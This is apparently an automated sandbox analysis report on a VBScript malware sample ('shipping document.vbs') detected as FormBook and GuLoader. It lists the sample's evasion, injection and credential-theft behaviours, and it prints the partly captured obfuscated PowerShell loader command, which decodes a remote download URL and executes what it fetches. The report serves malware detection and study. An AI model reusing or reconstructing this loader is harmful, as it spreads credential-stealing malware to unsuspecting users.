Edit tour
Windows
Analysis Report
shipping document.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2920 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\shipp ing docume nt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - WmiPrvSE.exe (PID: 6332 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 6856 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Ricki = 1;$Gehenna ='Substrin ';$Gehenna +='g';Func tion Quill aia($Overb evokser){$ Feasibilit ies=$Overb evokser.Le ngth-$Rick i;For($Kom peni=5; $K ompeni -lt $Feasibil ities; $Ko mpeni+=(6) ){$Fortrne lse+=$Over bevokser.$ Gehenna.In voke($Komp eni, $Rick i);}$Fortr nelse;}fun ction Stan dglas249($ Babbittess ){. ($Uti ) ($Babbit tess);}$Us heen=Quill aia ' S.bc M Autoo,ro omzA,uatiP reenlUdspi l emieaM.c ov/Toakt5E thno. Org, 0Kille Het ,r(EgetfW SelviNedru nSt nidva. ieogunvaw Brugsisbje propeNTid sfTAgter S tdta1Scale 0Ma em.Spu .g0Rensn;A ver B,ded WUrpr,iWou ndn Sprn6H ex n4Sub,e ; c.to Az. mexSvine6k evr4 Non. ;Perso Vir uera,tndv Han,:Store 1 horo2F r et1 oeme. opti0Inten )Skerr For krGSept,eS elebc hist kLe,lio As ,r/ Inhe2T ailz0Efter 1.ndos0.eu ro0Overb1B und 0,arav 1Ore,t Ope rFL.udai S prurSto,ve ,traafSlav io,earax . hot/ Udsu1 Eger2 Me. l1Krabd.Sp inu0Maedt ';$Boghold ersker=Qui llaia 'For biUOscilsa dr.seGangw rBevat- h, ldATheurgP i kyeSemid nKrilrt Ly p ';$Fint =Quillaia 'NondihBlo ckt ReintE tmaapInser s Indf:Int er/defo /T pvodFryse rUn aciTil b vSysseeE xecr.Kurs gberr oAdf rdo Loo.gI nconlAf al eGabes. .l otc Ant o SuccmGodhj /TermouMou n.cTermo?m aletefo,gr xNo.cupInc onoCensur. ejebtBarra =apraxd pu lvocohenwH an.knHol b l I.froCas eaaHyr,sdP ol r&Ar,np iTrichdBes tr= Gar,1U nmo oArbej D FugtjLse ad9Univei Po,c8Subba bFilat8 eg ngBrnefDFu ,le7Adspu4 BordvVAr.h dU ockac.a benOGamel_ Samme0Tilt rm PaynAAr b.taF.rreR SkulkxUnmu sSVildfOAn ,ipZSmithj KorrE l,e fISu.pkNU derBNucul5 Burm ';$O bservander nes=Quilla ia ' Gna > Stand ';$U ti=Quillai a 'DialaiM ,ddeePr.de xNonex ';$ Akkumulere de = Quill aia 'Skaff eNar,ocDat amhCathoou ,ali Fanem %MedisaRet sgpAlligpE jersd ,maa aIndsttKom b a Meta%U ,all\ Loen FWagneiTra ktnTys,li PillnGines d forssiso agt El viO ve slFrils lArsh,iRet ran KursgT eksteProku rUnifan Pr ece,eklasU d,ap1Wa,py 1B tte9 De xt.ArikoU outpnAfkal iIdeal Ne, tb&F,rbi&F lamm ozaee Firesc St, chfiguro l ede Illog$ Ulovm ';St andglas249 (Quillaia ' Cent$Am idog .lukl Y,ereogarn ibRetrtaN, nirlUdate: org.nR ech rerekinsPr eapiKonjag He nenMa.e meHogmorSl agte,appan pomeld.sen seEgn,rsIn ,ri=Ndraa( NatucF,jt imKunstd B vre kants/ Un,oc Fic , Yemen$ S tv,AKravek TnneskKomb iuFidusmle jrsuCardil trykkeMinj rAccoueSk rivd doupe Aroma)Pal, o ');Stand glas249 (Q uillaia ' Mask$Admir g R.shlQua rto Unrib S.deaDanse l Fork: Nu mmPReachrG lazef M.ll aValgrbDip htrGenkeiL .viskUnsen eVugger,rn ne=Learn$J ernbFChall iKhevznUds igtSkull. HressWolff p Un,rl Ub ndiStjertM a,ri(Tapet $Do,laORri ngb Ge,ts. nasseAk,us rRvhulvPan oraYnglen RecldFremf